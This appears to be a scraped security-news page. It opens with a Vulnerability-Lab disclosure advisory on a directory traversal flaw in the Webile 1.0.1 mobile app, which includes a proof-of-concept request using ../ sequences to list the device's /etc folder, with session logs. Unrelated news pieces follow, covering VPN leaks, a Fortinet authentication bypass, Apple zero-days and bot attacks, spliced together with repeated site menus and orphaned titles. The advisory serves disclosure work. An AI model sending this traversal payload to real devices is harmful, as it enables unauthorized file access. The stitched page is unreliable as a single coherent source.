Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Directory Traversal

Categories: News
Tags: a week in security

Tags:  week in security

Tags:  AI Bill of Rights

Tags:  Final Fantasy XIV

Tags:  Lock and Code S03E21

Tags:  Meta

Tags:  WhatsApp

Tags:  ransomware

Tags:  tax scam

Tags:  Chinese APT

Tags:  Android

Tags:  Chrome

Tags:  iOS

Tags:  managed detection response

Tags:  MDR

Tags:  disinformation

Tags:  FBI

Tags:  CISA

The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (October 10 - 16) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

Privacy VPN

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (October 10 - 16)

Categories: News
Tags: VPN

Tags:  iOS

Tags:  Android

Tags:  tunnel

Tags:  captive portal

Tags:  leak

Tags:  anonymity

“Block connections without VPN” doesn't block all connections without a VPN and “Always on VPN” isn't always on.



(Read more...)




The post Android and iOS leak some data outside VPNs appeared first on Malwarebytes Labs.

Virtual Private Networks (VPNs) on Android and iOS are in the news. It’s been discovered that in certain circumstances, some of your traffic is leaked so it ends up outside of the safety cordon created by the VPN.

Mullvad, the discoverers of this Android “feature” say that it has the potential to cause someone to be de-anonymised (but only in rare cases as it requires a fair amount of skill on behalf of the snooper). At least one Google engineer claims that this isn’t a major concern, is intended functionality, and will continue as is for the time being.

**MUL22-03**

The Android discovery, currently named MUL22-03, is not the VPN's fault. The transmission of data outside of the VPN is something which happens quite deliberately, to all brands of VPN, and not as the result of some sort of terrible hack or exploit. Although the full audit report has not yet been released, the information available so far may be worrying for some. According to the report, Android sends “connectivity checks” (traffic that determines if a connection has been made successfully) outside of whichever VPN tunnel you happen to have in place.

Perhaps confusingly, this also occurs whether or not you have “Block connections without VPN” or even “Always on VPN” switched on, which is (supposed) to do what you’d expect given the name. It’s quite reasonable to assume a setting which says one thing will not in fact do the opposite of that thing, so what is going on here?

The leakage arises as a result of certain special edge case scenarios, in which case Android will override the various “Do not do this without a VPN” settings. This would happen, for example, with something like a captive portal. A captive portal is something you typically access when joining a network—something like a hotspot sign-in page stored on a gateway.

Why? Because VPNs run on top of whatever Internet-connected network you are on, so you have to join a network before you can establish your VPN connection. Anything that happens before you establish your VPN connection can't be protected by it.

As per Bleeping Computer, this leakage can include DNS lookups, HTTPs traffic, IP addresses and (perhaps) NTP traffic (Network Time Protocol, a protocol for synchronising net-connected clocks).

Mullvad VPN first reported this a documentation issue, and then asked for a way to “...disable connectivity checks while 'Block connections without VPN' (from now on lockdown) is enabled for a VPN app.”

Google's response, via its issue tracker was “We do not think such an option would be understandable by most users, so we don't think there is a strong case for offering this.”

According to Google, disabling connectivity checks is a non-starter for four reasons: VPNs might actually be relying on them; "split channel" traffic that doesn't ever use the VPN might be relying on them; it isn't just connectivity checks that bypass the VPN anyway; and the data revealed by the connectivity checks is available elsewhere.

The rest is a back and forth debate on the pros and cons of this stance, which is still ongoing. At this point, Google is not budging.

**iOS has entered the chat**

It seems this isn’t something only confined to Android. There are similar things happening on iOS 16, with multiple Apple services claimed to be leaking outside of the VPN tunnel including maps, health, and wallet.

> We confirm that iOS 16 does communicate with Apple services outside an active VPN tunnel. Worse, it leaks DNS requests. #Apple services that escape the VPN connection include Health, Maps, Wallet.  
> We used @ProtonVPN and #Wireshark. Details in the video:#CyberSecurity #Privacy pic.twitter.com/ReUmfa67ln
> 
> — Mysk 🇨🇦🇩🇪 (@mysk\_co) October 12, 2022

According to Mysk, the traffic being sent to Apple isn't insecure, it's just going against what users expect.

> All of the traffic that appeared in the video is either encrypted or double encrypted. The issue here is about wrong assumptions. The user assumes that when the VPN is on, ALL traffic is tunneled through the VPN. But iOS doesn't tunnel everything. Android doesn't either.

They suggest that one way forward to stop this from happening would be to treat VPN apps as browsers and “require a special approval and entitlement from Apple”.

There probably won’t be much movement on this issue until the release of the full report on MUL22-03, but for now the opinion from those involved in testing seems to be that the risk is small.

Android and iOS leak some data outside VPNs

Plus: Hackers hit the Mormon Church, Signal plans to ditch SMS for Android, and a Fat Bear election erupts in scandal.

Users of the cryptocurrency exchange Celsius are in danger. Last week, as part of its bankruptcy proceedings, the company submitted a 14,500-page document that appears to contain the full names and recent transactions of its users. Typically private, this sensitive information ties people’s real-world identities to their once-anonymous cryptocurrency transactions, making them ripe targets for scammers and other criminals—and crypto-tracing investigators.

If you’re considering upgrading to the new Pixel 7 or Pixel 7 Pro, rest assured that Google put the phone’s security hardware through the wringer to make hacking the device as costly as possible. Not only that, the tech giant plans to roll out a built-in VPN for Android later this year.

For Windows 11 users, we walked through how to take advantage of Microsoft’s automatic phishing protection features. And for students and their parents, we explained exactly what to do to protect against school surveillance technology.

Finally, a Connecticut jury decided this week that Infowars host Alex Jones must pay nearly $1 billion in damages for defaming the families of victims of the 2012 mass shooting at Sandy Hook Elementary, as well as an FBI agent who responded to the horrific scene. The historic jury award doesn’t change what “free speech” means in the United States, but it might make social media platforms rethink their disinformation strategies.

But that’s not all! Each week, we round up the news we didn’t cover in depth ourselves. Click the headlines to read the full stories, and stay safe out there.

SpaceX says it can no longer fund Starlink satellite internet service in war-torn Ukraine, according to documents obtained by CNN. More than 20,000 Starlink terminals have been donated to the country since Russia invaded in February, and the service has been a lifeline for Ukrainian military efforts. But the $120 million it will take to fund the service through the end of the year is too much for SpaceX, and the company has reportedly asked the Pentagon to pick up the bill going forward.

The move to pull funding comes at an inauspicious time for Elon Musk, SpaceX’s outspoken CEO. The leaked letter asking the Pentagon to pay for Ukraine’s Starlink terminals and service is dated September 8. Less than a month later, on October 3, Musk got into a fight on Twitter with Ukrainian officials after suggesting the country end the war by largely agreeing to Russia’s demands. While a report said that Musk had a call with Russian president Vladimir Putin prior to his tweet about Ukraine appeasing Russia, both the billionaire and the Kremlin deny the call took place.

The Church of Jesus Christ of Latter-Day Saints (often known as LDS or the Mormon Church) revealed this week that hackers breached its systems in late March. In a statement, the church said that it did not disclose the intrusion until now at the request of law enforcement. While LDS says that donation histories and payment card information were not accessed, the data may include “your username, membership record number, full name, gender, email address(es), birthdate, mailing address, phone number(s), and preferred language.” According to the church, federal authorities believe the breach was “part of a pattern of state-sponsored cyberattacks aimed at organizations and governments around the world that are not intended to cause harm to individuals.”

Signal users on Android collectively groaned this week after the Signal Foundation announced that it would no longer support SMS and MMS messaging in the app. The convenient feature allowed Android users to message anyone, regardless of whether they were on Signal, through the app. (Signal’s iOS version did not support this feature.) Signal said in its announcement that the move was due to the inherent insecurity of SMS and the potential for users to forget that they weren’t sending end-to–end encrypted messages to non-Signal contacts. Signal’s lead Android developer, Greyson Parrelli, added in a forum post that part of the reason Signal was ditching SMS and MMS was because Signal “doesn’t play well” with RCS, Google’s new messaging protocol.

Not even bear-based elections are safe these days. On Sunday, officials behind Katmai National Park’s annual Fat Bear Week contest discovered that someone had monkeyed with the vote by flooding it with some 9,000 fake ballots in favor of a bear named 435. Fat Bear election integrity officials soon discovered thousands of fake email addresses linked to the bogus ballots, corrected the tally, and added a captcha to the site to fend off the spammers. Ultimately, a 1,400-pound grizzly aptly named 747 overtook 435 by some 7,000 votes and won the competition. “Bears don’t actually get anything from competing in or winning Fat Bear Week,” Amber Kraft, who helps run the competition at the park, told _Bloomberg_. “Despite which bear wins the most votes in the Fat Bear Week competition, they are all winners.”

Elon Musk’s SpaceX Bails on Starlink Funding for Ukraine

By Waqas
Bot attacks rose by 41% in H1 2021, with the financial services and media industries facing the highest proportion…
This is a post from HackRead.com Read the original post: Rising Bot Attacks – Why is Your Organization Struggling to Deal with Them?

Bot attacks rose by 41% in H1 2021, with the financial services and media industries facing the highest proportion of these attacks. 71% of global CIOs/ CISOs admit that they have seen an increase in successful attacks, while 78% believe they had more customer churn and complaints owing to bot attacks. 

Despite the increase in successful bot-based attacks, many organizations are underprepared to fend off these lethal and increasingly stealthy attacks. Read on to know why your organization fails to mitigate bot attacks. 

Let’s discuss why organizations are unable to manage rising Bot attacks.

**Organizations are Underprepared **

Only 19% of organizations currently use full-fledged, comprehensive bot management solutions and programs, while 78% continue relying on WAFs, CDNs, and DDoS mitigation to prevent bot-based attacks.

This protects you only against ad frauds, influence fraud attacks, and card frauds, leaving you open to a wide range of more lethal, sophisticated attacks. 

**One-Third of Bots can Mimic Human Behaviour **

Like organizations adapting to the changing times, attackers are leveraging automation, AI, and ML to ensure bots can behave more human-like, from mouse movements to keystrokes and clicks.

Since 37% of bad bots can closely mimic human behaviour, they can seamlessly evade detection by traditional security tools and defenses. 

**Continuously Increasing Sophistication of Bot Attacks **

Malicious bots made up almost 28% of the global web traffic, a record high, in 2021. Of these, two-thirds were evasive bots capable of seamlessly evading security tools and defenses. They use techniques such as encrypted requests, anonymous proxies to enter websites and apps, masking/ changing identities, mimicking human behaviour, cycling through random IPs, and so on.

Bad bots also learn over time and automatically use different techniques to evade detection. Attackers leverage deep dark-web intelligence, highly sophisticated tools and the latest technology, mass data breaches, automated processes, and, most importantly, expansive global fraud networks to industrialize fraud and orchestrate attacks. This is another reason for the increasing sophistication of bot attacks. 

Further, attackers can easily customize attacks for each target. Attackers take time and effort to understand bot mitigation techniques and keep creating mutated versions of bot attacks to ensure they can keep evading detection. 

**The Array of New Endpoints Offers a Larger Attack Surface **

The attack surface has widened with the growing use of IoT devices, APIs, mobile devices, and microservices instead of single monolithic apps to offer better functionalities and user experiences. This has also led to increased misconfigurations, weaknesses, vulnerabilities, and security complexities that you can simply not get ahead of. 

These new endpoints, often under-protected or unprotected, become ripe targets for bot attacks. You cannot stop bot threats without comprehensive, advanced, and fully managed security solutions that include focused API bot mitigation. 

**Traditional Signature-Based Detection is Found Wanting **

Several organizations, even with dedicated bot security solutions, cannot stop complex bot attacks. This is because their bot management solution focuses on traditional signature-based detection techniques. 

Data suggest that bots are so smart and efficient today that automated attack signatures are three times more complicated than in previous years. To effectively stop these attacks, you would have to collect, review and correlate several data points to form a single attack signature. And this attack signature is bound to change as attackers constantly work to improve their modus operandi. 

You need behaviour, pattern, and heuristic analysis, fingerprinting, and workflow validation to stop the complex automated attacks of today. This helps you identify anomalous behaviours and stop them. When backed by machine learning and artificial intelligence, these solutions can automatically redefine normal variance in acceptable behaviours. 

**The Reliance on In-House Bot Management Solutions **

Several organizations continue to rely on in-house bot management solutions that are incapable of stopping the sophisticated automated threats of today. These solutions rely on signature-based detection. They only have access to internal data and past attack history but don’t have access to the global threat feeds. 

Without visibility into the range of bots, evasion techniques, and the latest attacks, it is impossible to get ahead of the latest threats. Further, organizations may not engage in continuous research to understand the latest threats and find ways to avert them. 

**The Way Forward**

To effectively avert and manage the latest breed of sophisticated and evasive bot attacks, you must invest in comprehensive, fully managed, and next-gen bot management solutions from trusted security experts like Indusface. This solution can identify and thwart bot attacks, including automated API bot threats. 

**More Bots News**

1.  Baby Got Bots
2.  Microsoft’s ‘Tay and You’ AI bot went completely Nazi
3.  Will good prevail over bad as bots battle for the internet?
4.  The Curious Case of Creepy Twitter Bot Spying and Posting Images

Rising Bot Attacks – Why is Your Organization Struggling to Deal with Them?

Microsoft highlighted emerging confidential computing offerings for Azure during its Ignite conference.

Microsoft is putting hardware in charge of data protection in Azure to help customers feel confident about sharing data with authorized parties within the cloud environment. The company made a series of hardware security announcements at its Ignite 2022 conference this week to highlight Azure's confidential computing offerings.

Confidential computing involves creating a Trusted Execution Environment (TEE), essentially a black box to hold encrypted data. In a process called attestation, authorized parties can place code inside the box to decrypt and access the information without first having to move the data out of the protected space. The hardware-protected enclave creates a trustworthy environment in which data is tamper-proof, and the data isn't accessible to even those with physical access to the server, a hypervisor, or even an application.

"It's really kind of the ultimate in data protection," Mark Russinovich, Microsoft Azure's chief technology officer, said at Ignite.

**On Board With AMD's Epyc**

Several of Microsoft's new hardware security layers take advantage of on-chip features included in Epyc — the server processor from Advanced Micro Devices deployed on Azure.

One such feature is SEV-SNP, which encrypts AI data when in a CPU. Machine-learning applications move data continuously between a CPU, accelerators, memory, and storage. AMD's SEV-SNP ensures data security inside the CPU environment, while locking off access to that information as it goes through the execution cycle.

AMD's SEV-SNP feature closes a critical gap so data is secure at all layers while residing or moving in the hardware. Other chip makers have largely focused on encrypting data while in storage and in transit on communication networks, but AMD's features secure data while being processed in the CPU.

That offers multiple benefits, and companies will be able to mix proprietary data with third-party datasets residing in other secure enclaves on Azure. The SEV-SNP features use attestation to ensure incoming data is in its exact form from a relying party and can be trusted.

"This is enabling net new scenarios and confidential computing that was not possible before," said Amar Gowda, principal product manager at Microsoft Azure, during an Ignite webcast.

For example, banks will be able to share confidential data without the fear of anyone stealing it. The SEV-SNP feature will bring encrypted bank data into the secure third-party enclave where it could mingle with datasets from other sources.

"Because of this attestation and memory protection and integrity protection, you can rest assured that the data does not leave the boundaries in the wrong hands. The whole thing is about how do you enable new offerings on top of this platform," Gowda said.

**Hardware Security on Virtual Machines**

Microsoft also added additional security for cloud-native workloads, and the non-exportable encryption keys generated using SEV-SNP are a logical fit for enclaves where data is transient and not retained, James Sanders, principal analyst for cloud, infrastructure, and quantum at CCS Insight, says in a conversation with Dark Reading.

"For Azure Virtual Desktop, SEV-SNP adds an additional layer of security for virtual-desktop use cases, including bring-your-own-device workplaces, remote work, and graphics-intensive applications," Sanders says.

Some workloads haven't moved to the cloud because of regulation and compliance limitations tied to data privacy and security. The hardware security layers will allow companies to migrate such workloads without compromising their security posture, Run Cai, a principal program manager at Microsoft, said during the conference.

Microsoft also announced that the Azure virtual desktop with confidential VM was in public preview, which will be able to run Windows 11 attestation on confidential VMs.

"You can use secure remote access with Windows Hello and also secure access to Microsoft Office 365 applications within confidential VMs," Cai said.

Microsoft has been dabbling with the use of AMD's SEV-SNP in general-purpose VMs from earlier this year, which was a good start, CCS Insight's Sanders says.

Adoption of SEV-SNP is also important validation for AMD among data center and cloud customers, as previous efforts at confidential computing relied on partial secure enclaves rather than protecting the entire host system.

"This was not straightforward to configure, and Microsoft left it to partners to provide security solutions that leveraged in-silicon security features," Sanders says.

Microsoft's Russinovich said that Azure services to manage hardware and deployment of code for confidential computing are coming. Many of those managed services will be based on Confidential Consortium Framework, which is a Microsoft-developed open source environment for confidential computing.

"Managed service is in preview form ... we've got customers that are kicking the tires on it," Russinovich said.

Microsoft Secures Azure Enclaves With Hardware Guards

The authentication bypass flaw in FortiOS, FortiProxy and FortiSwitchManager is easy to find and exploit, security experts say.

Concerns over a critical authentication bypass vulnerability in certain Fortinet appliances heightened this week with the release of proof-of-concept (PoC) exploit code and a big uptick in vulnerability scans for the flaw.

The bug (CVE-2022-40684) is present in multiple versions of Fortinet's FortiOS, FortiProxy and FortiSwitchManager technologies. It allows an unauthenticated attacker to gain administrative access to affected products via specially crafted HTTPS and HTTP requests, and potentially use that as entry point to the rest of the network.

Bharat Jogi, director of vulnerability threat research at Qualys says researchers at the company have observed mass scans being carried out by various threat actors to identify Internet facing vulnerable systems for compromise.

"They are compromising these systems to create a super\_admin user which provides them with complete access and control," Jogi says. "Once this level of access is achieved, they have the ability to delete any trace of their successful exploitation attempt, making it difficult for organizations to track compromised assets in their environment."

If this flaw is successfully exploited, an attacker would have complete access to the organization's internal systems that were previously protected by Fortinet's firewalls, he says. "Having a compromised firewall is like laying out a red carpet for threat actors to stroll right into your organization's environment," Jogi notes.

**Added to CISA's Known Exploited Vulnerabilities Catalog**

The US Cybersecurity and Infrastructure Security Agency (CISA) earlier this week added the vulnerability to its Known Exploited Vulnerabilities catalog. Federal executive branch agencies—which are required to remediate vulnerabilities in the catalog within specific deadlines—have until Nov. 1 to address it. Though the deadline applies only to federal agencies, security experts have previously noted how it is a good idea for all organizations to monitor the vulnerabilities in the catalog and follow CISA's deadline for implementing fixes.

Fortinet privately notified customers of the affected products about the vulnerability last Friday, along with instructions to immediately update to patched versions of the technology the company had just released. It advised companies that could not update for any reason to immediately disable Internet-facing HTTPS administration until they could upgrade to the patched versions. 

"Due to the ability to exploit this issue remotely, Fortinet is strongly recommending all customers with the vulnerable versions to perform an immediate upgrade," Fortinet said in its private notification, a copy of which was posted on Twitter the same day.

Fortinet followed up with a public vulnerability advisory on Monday describing the flaw and warning customers of potential exploit activity. The company said it was aware of instances where attackers had exploited the vulnerability to download the configuration file from affected systems and to add a malicious super\_admin account called "fortigate-tech-support".

Since then, penetration testing from Horizon3.ai has released proof-of-concept code for exploiting the vulnerability along with a technical deep dive of the flaw. A template for scanning for the vulnerability has also become available on GitHub.

Exacerbating the concerns is the relatively low bar for exploiting the flaw. "This vulnerability is extremely easy for an attacker to exploit. All that is required is access to the management interface on a vulnerable system," Zach Hanley, chief attack engineer at Horizon3.ai, tells Dark Reading

**Increase in Scanning Activity for the Flaw**

Qualys isn't the only company observing increased vulnerability scanning for the flaw. James Horseman, exploit developer at Horizon3.ai says public data from GreyNoise—which tracks Internet scanning activity hitting security tools—shows the number of unique IPs using the exploit has grown from the single digits a few days ago, to over forty as of Oct. 14.

"We expect the number of unique IPs using this exploit to rapidly increase in the coming days," Horseman says. It is not hard for attackers to find vulnerable systems, he adds: A Shodan search for instance shows more than 100,000 Fortinet systems worldwide. 

"Not all of these will be vulnerable, but a large percentage will be," Horseman says.

Johannes Ullrich, dean of research at the SANS Institute, says he has observed scans associated with an older FortiGate vulnerability (CVE-2018-13379,) hitting SANS' honeypots in the days following disclosure of the new bug. He says there are two theories why that might be happening.

One of them is that an attacker may have tried to catch as many devices as possible that had not yet been patched for the old vulnerability. Given the attention the new vulnerability has gotten it is likely the old vulnerability will get patched as well now, he says.

"Or the attacker was trying to find Fortinet devices to exploit using the new vulnerability once it is available," he theorizes. "The old vulnerability scanner they had sitting on the shelf may still work to identify Fortinet devices."

**A Popular Attacker Target**

Concerns over vulnerabilities in Fortinet products are not new. The company's technologies—and those of others selling similar appliance—have been frequently targeted by attackers trying to gain an initial foothold on target network. 

Last November. The FBI, CISA and others issued an advisory warning of Iranian advanced persistent threat actors exploiting vulnerabilities in Fortinet and Microsoft products. A similar alert in April 2021 warned of attackers exploiting flaws in FortiOS to break into multiple government, commercial, and technology services.  

"These vulnerable devices are often edge devices, so an attacker could potentially use this vulnerability to gain access to an organization's internal networks to launch further attacks," Hanley says.

Fortinet itself has recommended that organizations that are able to, must update to the newly patched versions of FortiOS, FortiProxy and FortiSwitch Manager. For organizations that cannot immediately update, Fortinet has provided guidance on how to disable the HTTP/HTTPS interface or limit IP addresses that can reach the administrate interface of the affected products.

Hanley says organizations sometimes may not be able to patch due to the potential downtime associated with updating a device. "However, an organization should be able to apply \[the\] workaround to prevent this vulnerability from being exploited on unpatched machines by following Fortinet’s guidance."

Qualys' Jogi adds, "It is also crucial to review any attempts of exploit to identify systems that may have already been compromised. If an organization is unable to patch their systems, then they must disable the system admin interface immediately."

Concerns Over Fortinet Flaw Mount; PoC Released, Exploit Activity Grows

Such exploits sell for up to $10 million, making them the single most valuable commodity in the cybercrime underworld.

Over the past few years, there's been an increase in the number of attackers targeting Apple, especially with zero-day exploits. One major reason is that a zero-day exploit might just be the most valuable asset in a hacker's portfolio — and hackers know it. In 2022 alone, Apple has discovered seven zero-days and has followed up these discoveries with the required remedial updates. But it doesn't seem like the cat-and-mouse game will die anytime soon.

In 2021, the number of recorded zero-days overall was more than double the figures recorded in 2020, showing the highest level since tracking began in 2014, according to a repository maintained by Project Zero. MIT Technology Review attributed this rise to the "rapid global proliferation of hacking tools" and the willingness of powerful state and non-state groups to invest handsomely in the discovery and infiltration of these operating systems. Threat actors actively search for vulnerabilities, find a way to exploit them, then sell the information to the highest bidder.

**The Zero-Day Battles**

Suffering repeatedly from these infiltrations is the tech giant, Apple. After recovering from 12 recorded exploitations and remediation in 2021, Apple was welcomed into the new year of 2022 with two zero-day bugs in its operating systems and a WebKit flaw that could have leaked users' browsing data. Barely one month after releasing 23 security patches to fix those issues, another flaw was discovered — one that would allow attackers to infect users' devices when they process certain malicious Web content.

Fast-forward to August 17 and Apple revealed it had found two new vulnerabilities in its operating system: CVE-2022-32893 and CVE-2022-32894. The first vulnerability gives remote code execution (RCE) access to Apple's Safari Web browser kit, used by every iOS and macOS-enabled browser. The second, another RCE flaw, gives attackers complete and unrestricted access to the user's software and hardware. Both vulnerabilities affect most Apple devices — especially the iPhone 6 and later models, iPad Pro, iPad Air 2 onwards, iPad 5th generation and newer models, iPad mini 4 and newer versions, iPod touch (7th generation), and macOS Monterrey. Recognizing the risk level of such a threat, Apple recently released security updates to remediate these "actively exploited" vulnerabilities. This would be the fifth and sixth zero-day vulnerability exploited in Apple's systems just this year.

A couple weeks later, speculations about another zero-day exploit arose. One research team, in particular, said it found an ad on the Dark Web offering a supposedly weaponized version of an Apple vulnerability for over €2 million. While these speculations remain unconfirmed, soon after Apple released security updates for its seventh actively exploited zero-day vulnerability of 2022: CVE-2022-32917. According to the advisory, attackers could leverage this flaw to create applications that execute arbitrary code with kernel capabilities.

Zero-day exploits sell for up to $10 million, Digital Shadows' Photon Research Team reports, positioning them as the single most expensive commodity in the cybercrime underworld. With a bounty like that, the market for these exploits are bound to expand and further exacerbate cyber threats.

**Apple Isn't Alone in the Zero-Day Wild**

Apple is not alone in this struggle. In recent months, tech giants like Microsoft, Adobe, and Google have also had to patch zero-day vulnerabilities that have been actively exploited in the deep Web. A June article on Dark Reading noted that there had been "a total of 18 security vulnerabilities exploited as unpatched zero-days in the wild," and the number has since risen to 24. From all indications, attackers won't slow down anytime soon, especially as new variants of already patched zero days continue to surface.

As adversaries continue to find loopholes across systems and security architectures, enterprise leaders must keep prioritizing proactive defenses to stay ahead of attacks. One way to be proactive, according to Craig Harber, CTO at Fidelis Cybersecurity, is for organizations to map cyber terrains by gaining full visibility into their entire systems.

"Discovery is a ballet of strategy, inventory, and evaluation. Organizations need the ability to continuously discover, classify, and assess assets — including servers, enterprise IoT, laptops, desktops, shadow IT, and legacy systems," he notes.

Apple's Constant Battles Against Zero-Day Exploits

By Owais Sultan
Businesses across the United States are using web scraping, or web data collection, infrastructure as a first line…
This is a post from HackRead.com Read the original post: How web data is leading US cybersecurity to unreached possibilities

Businesses across the United States are using **web scraping**, or web data collection, infrastructure as a first line of defense against potential cybersecurity threats and fraud.

Security teams use web data to achieve real-time visibility over the public domain, where digital fraud and risks mainly occur, and test their networks against vulnerabilities that may appear online.

**Security in a Sandbox**

At the forefront, web data helps security teams understand online risks by providing them an early indication and, with that, the ability to monitor and **assess threats in real-time**.

Security specialists use web scraping to research these different threat scenarios in a risk-free environment, which helps them discover how to prevent digital risks from affecting their organization’s internal infrastructure.

This includes identifying possible malware, suspicious or repetitive actions targeting the network, testing incident response capabilities, or the organization’s ability to detect and prevent real-time threats or intrusions.

Omri Orgad, Managing Director of North America at **Bright Data**, says:

“It is no longer a question as to whether your organization will be exposed to such threats, it is more a question of timing. And to be prepared to meet the challenge posed by these threats, security teams need to use web data networks to be able to better anticipate them and achieve real-time visibility across the cybersecurity landscape.”

**Mapping out the Internet**

Many US organizations, which “bad actors” often see as prime targets with deep pockets, use web platforms’ infrastructure to essentially map out the internet to search for potential threats and assess the risk of certain domains or links.

To accomplish this, these security teams route requests through such networks to target potentially malicious websites or URLs. 

The requests then return information or public web data. That web data provides details on how the domain reacted to the request, which then allows the security teams to assess the threat and take **proper action to mitigate** it before it ever affects them internally.

The reason the requests are routed through the web infrastructure is to further safeguard the organization’s internal systems during testing. These networks provide a safety net for security teams to be able to test their systems against digital threats in the public domain. This can be done without sacrificing the integrity of their organizational infrastructure due to the way the requests are routed – away from their systems.

This essentially provides a **firewall**, opening one-way access to information, which helps security teams identify and mitigate threats before they even happen, without the risk.

**Scraping for Malware and Phishing Schemes Targeting US Banks**

The security departments of some of the leading US banks use web scraping tools and methods to gather information about possible online threat actors, check for potential phishing links, and examine malware in a safe setting.

These teams use scraping techniques to continually scan the public domain to discover any vulnerabilities that may be located within potentially malicious websites or links, in real-time.

Once identified, the security teams then route a request to the suspicious URL, using the web network infrastructure to gather information and assess the risk of threat.

This allows them to automatically identify different phishing sites that attempt to steal sensitive client or company information, such as usernames, passwords, and credit card information.

